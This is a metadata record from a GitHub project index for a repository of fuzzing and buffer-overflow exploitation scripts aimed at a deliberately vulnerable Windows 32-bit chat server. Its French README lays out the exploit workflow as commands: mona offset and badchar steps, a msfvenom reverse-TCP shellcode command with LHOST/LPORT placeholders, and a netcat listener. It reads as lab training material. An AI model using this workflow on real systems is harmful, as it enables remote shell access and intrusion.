{"id":22647431,"url":"https://github.com/processust/exploitation-buffer-overflow-windows-32-bits-","last_synced_at":"2026-01-21T06:17:51.545Z","repository":{"id":82910880,"uuid":"502029493","full_name":"ProcessusT/Exploitation-Buffer-Overflow-Windows-32-bits-","owner":"ProcessusT","description":null,"archived":false,"fork":false,"pushed_at":"2022-06-10T12:12:00.000Z","size":27,"stargazers_count":2,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-25T08:01:37.156Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ProcessusT.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-06-10T12:09:42.000Z","updated_at":"2023-04-16T13:22:45.000Z","dependencies_parsed_at":null,"dependency_job_id":"7e6436b1-56cf-45f8-a069-1be7b914e305","html_url":"https://github.com/ProcessusT/Exploitation-Buffer-Overflow-Windows-32-bits-","commit_stats":null,"previous_names":["processust/exploitation-buffer-overflow-windows-32-bits-"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FExploitation-Buffer-Overflow-Windows-32-bits-","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FExploitation-Buffer-Overflow-Windows-32-bits-/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FExploitation-Buffer-Overflow-Windows-32-bits-/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ProcessusT%2FExploitation-Buffer-Overflow-Windows-32-bits-/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ProcessusT","download_url":"https://codeload.github.com/ProcessusT/Exploitation-Buffer-Overflow-Windows-32-bits-/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248385360,"owners_count":21094871,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-09T07:33:36.841Z","updated_at":"2026-01-21T06:17:51.503Z","avatar_url":"https://github.com/ProcessusT.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Exploitation-Buffer-Overflow-Windows-32-bits\n\n\nScripts de fuzzing et d'exploitation de buffer overflow 32 bits sous Windows\n\n\nLes fichiers chatserver.exe et essfunc.dll sont incluent pour tester les scripts (Attention, l'application est vulnérable)\n\n\nLa liste des commandes est disponible dans le fichiers COMMANDS.txt\n\n\n\n------------------------------------------------------------------------------------------\n\n\n\n# Dans immunity on créer un nouveau workspace :\n!mona config -set workingfolder c:\\mona\\%p\n\n# On fuzz le binaire pour trouver l'offset qui créera le segfault avec le script fuzzing.py\n\n# On créer un pattern avec metasploit pour trouver l'offset d'EIP\nmsf-pattern_create -l 2400\n\n# On prend un template d'exploit et on ajoute notre pattern en tant que payload pour détecter le segfault\n\n# On Retrouve l'offset exacte d'EIP au moment du crash\n!mona findmsp -distance 2400\n\n# On met à jour l'offset dans le script d'exploit et on recherche les badchars\n\n# On créer un tableau de badchars avec mona\n!mona bytearray -b \"\\x00\"\n\n# On génère une chaîne de badchars qu'on ajoute en tant que payload dans le script d'exploit\n\n# On compare les badchars avec l'offset d'ESP au moment du crash\n!mona compare -f C:\\mona\\\u003cworkingfolder\u003e\\bytearray.bin -a \u003cESP offset\u003e\n\n# On génére un shellcode avec metasploit excluant les badchars\nmsfvenom -p windows/shell_reverse_tcp LHOST=\u003clhost\u003e LPORT=\u003clport\u003e -b \"\u003cbadchars\u003e\" -f py\n\n# On trouve un offset de jump sur ESP avec mona pour exécuter le shellcode\n!mona jmp -r esp -cpb \"\u003cbadchars\u003e\"\n\n# On met à jour l'offset du retn dans le script d'exploit et on ajoute des NOPS (16 c'est pas mal)\n\n# On démarre un netcat en local et on exploite :)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fexploitation-buffer-overflow-windows-32-bits-","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprocessust%2Fexploitation-buffer-overflow-windows-32-bits-","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprocessust%2Fexploitation-buffer-overflow-windows-32-bits-/lists"}